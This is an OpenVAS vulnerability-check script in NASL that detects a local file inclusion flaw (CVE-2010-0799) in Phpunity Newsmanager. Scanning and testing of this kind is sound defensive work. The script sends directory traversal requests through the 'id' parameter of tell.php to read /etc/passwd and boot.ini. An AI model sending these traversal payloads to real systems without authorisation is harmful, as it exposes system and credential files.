###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_phpunity_newsmanager_lfi_vuln.nasl 7520 2010-03-05 09:56:24Z mar $
#
# Phpunity Newsmanager Local File Inclusion Vulnerability
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_id(800484);
  script_version("$Revision: 1.0$");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"risk_factor", value:"Medium");
  script_cve_id("CVE-2010-0799");
  script_name("Phpunity Newsmanager Local File Inclusion Vulnerability");
  desc = "
  Overview: This host is running Phpunity Newsmanager and is prone to local
  file inclusion vulnerability.

  Vulnerability Insight:
  Input passed to the 'id' parameter in 'misc/tell_a_friend/tell.php' is not
  properly verified before being used to read files. This can be exploited to
  partially disclose content of arbitrary files via directory traversal attacks
  and URL-encoded NULL bytes.

  Impact:
  Successful exploitation will let the attacker to disclose potentially sensitive
  information.

  Impact level: Application

  Affected Software/OS:
  Phpunity.Newsmanager

  Fix: No solution or patch is available as on 05th March, 2010. Information
  regarding this issue will be updated once the solution details are available.
  For updates refer, http://www.perlunity.de/php/scripts/phpunity.newsmanager.shtml

  References:
  http://secunia.com/advisories/38409
  http://www.exploit-db.com/exploits/11290
  http://packetstormsecurity.org/1001-exploits/phpunity-lfi.txt

  CVSS Score:
    CVSS Base Score     : 4.3 (AV:N/AC:M/Au:NR/C:P/I:N/A:N)
    CVSS Temporal Score : 3.9
  Risk factor: Medium";

  script_description(desc);
  script_summary("Check The Attack String on Phpunity.Newsmanager");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}


include("http_func.inc");
include("version_func.inc");

pnPort = get_http_port(default:80);
if(!pnPort){
  exit(0);
}

foreach dir (make_list("/phpunity.newsmanager", "/Phpunity_Newsmanager" , cgi_dirs()))
{
  sndReq = http_get(item:string(dir, "/tmpl/news_main.htm"), port:pnPort);
  rcvRes = http_send_recv(port:pnPort, data:sndReq);
  if((":: phpunity.newsmanager ::" >< rcvRes))
  {
    sndReq = http_get(item:string(dir, "/misc/tell_a_friend/tell.php?id=" +
                          "../../../../../../../etc/passwd"), port:pnPort);
    rcvRes = http_send_recv(port:pnPort, data:sndReq);
    if(":daemon:/sbin:/sbin/" >< rcvRes)
    {
      security_warning(pnPort);
      exit(0);
    }

    sndReq = http_get(item:string(dir, "/misc/tell_a_friend/tell.php?id=" +
                          "../../../../../../../boot.ini"), port:pnPort);
    rcvRes = http_send_recv(port:pnPort, data:sndReq);
    if("\WINDOWS" >< rcvRes || "operating systems" >< rcvRes || "partition" >< rcvRes)
    {
      security_warning(pnPort);
      exit(0);
    }
  }
}
